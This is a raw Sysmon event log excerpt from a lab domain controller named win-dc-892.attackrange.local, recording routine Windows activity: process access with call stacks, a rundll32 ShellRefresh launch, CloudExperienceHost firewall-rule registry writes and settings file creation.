AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.246{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.246{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.230{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 
10341000x80000000000000004893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.230{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.230{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.230{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.230{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.230{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.230{266CAFBE-64C6-6064-A900-00000000AE01}34043024C:\Windows\system32\svchost.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\System32\AppXDeploymentExtensions.desktop.dll+21b54|C:\Windows\System32\AppXDeploymentExtensions.desktop.dll+2a21d|c:\windows\system32\appxdeploymentserver.dll+157ebf|c:\windows\system32\appxdeploymentserver.dll+ae504|c:\windows\system32\appxdeploymentserver.dll+92924|c:\windows\system32\appxdeploymentserver.dll+19e0c|c:\windows\system32\appxdeploymentserver.dll+2bffd|c:\windows\system32\appxdeploymentserver.dll+2bdf9|C:\Windows\SYSTEM32\ntdll.dll+80974|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.233{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXErundll32.exe 
AppXDeploymentExtensions.OneCore.dll,ShellRefreshC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx 13241300x80000000000000004886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.215{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-3|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|B=C:\Windows\system32\wwahost.exe|M=microsoft.windows.cloudexperiencehost_cw5n1h2txyewy|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\|PFN=Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy| 13241300x80000000000000004885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:16.215{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{CF587D09-6019-4820-AD86-AA38CA29C8DE}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000004884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:16.215{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{A1AE94CE-6A7D-4595-AE10-42357FE58954}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000004883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:16.215{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{A3F80EC4-1762-4474-8A4B-4AD1FC4BDD0B}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x80000000000000004882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:16.215{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{38D80225-2FD4-428D-A8CD-11F44F0F9FC0}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Security=Authenticate| 13241300x80000000000000004881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:16.199{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{F115ABF0-50AF-4365-A9FF-E7E52A7CF0CA}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Security=Authenticate| 13241300x80000000000000004880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:16.199{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{959FD32D-F84A-4D4B-A729-B73FB5AA9657}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x80000000000000004879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:16.199{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{4047441B-1230-46F6-9DA3-074966D014EE}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x80000000000000004878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:16.199{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{0B7622EE-3676-45E4-8291-E27B4958787B}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x80000000000000004877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.199{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{182661CB-5248-4E67-95A5-2F771A4844F7}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 
11241100x80000000000000004876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.199{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:16.199 23542300x80000000000000004875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.184{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.168{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.168{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.168{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.168{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
